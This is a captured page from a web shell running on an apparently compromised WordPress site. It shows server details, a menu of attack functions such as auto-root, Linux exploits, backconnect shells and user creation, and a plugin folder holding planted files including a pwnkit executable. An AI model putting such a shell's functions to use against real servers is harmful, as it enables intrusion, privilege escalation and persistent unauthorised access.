Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
geodirectory /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CONTRIBUTING.md
2.16
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
db-language.php
142
B
-rw-r--r--
geodirectory.php
16.79
KB
-rw-r--r--
index.php
26
B
-rw-r--r--
language.php
24.58
KB
-rw-r--r--
license.txt
35.18
KB
-rw-r--r--
phpcs.xml.dist
1.44
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
47.12
KB
-rw-r--r--
uninstall.php
5.47
KB
-rw-r--r--
upgrade.php
6.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpcs.xml.dist
<?xml version="1.0"?> <ruleset name="WordPress Coding Standards for Plugins"> <description>Only scans for security issues</description> <rule ref="WordPress-Extra" /> <!-- Check all PHP files in directory tree by default. --> <arg name="extensions" value="php"/> <file>.</file> <!-- Show progress and sniff codes in all reports --> <arg value="ps"/> <exclude-pattern>*/node_modules/*</exclude-pattern> <exclude-pattern>*/vendor/*</exclude-pattern> <exclude-pattern>*/index.php</exclude-pattern> <exclude-pattern>*/includes/libraries/*</exclude-pattern> <exclude-pattern>*/tests/*</exclude-pattern> <rule ref="Internal.NoCodeFound"> <exclude-pattern>*</exclude-pattern> </rule> <rule ref="Squiz.Commenting"> <exclude-pattern>*</exclude-pattern> </rule> <rule ref="Generic.Commenting.DocComment"> <exclude-pattern>*</exclude-pattern> </rule> <rule ref="Generic.Formatting"> <exclude-pattern>*</exclude-pattern> </rule> <rule ref="Generic.WhiteSpace"> <exclude-pattern>*</exclude-pattern> </rule> <rule ref="WordPress.Files.FileName.InvalidClassFileName"> <exclude-pattern>*</exclude-pattern> </rule> <rule ref="WordPress.Files.FileName.NotHyphenatedLowercase"> <exclude-pattern>*</exclude-pattern> </rule> <config name="minimum_supported_wp_version" value="4.9" /> <rule ref="WordPress.WP.I18n"> <properties> <property name="text_domain" type="array" value="geodirectory" /> </properties> </rule> </ruleset>
Close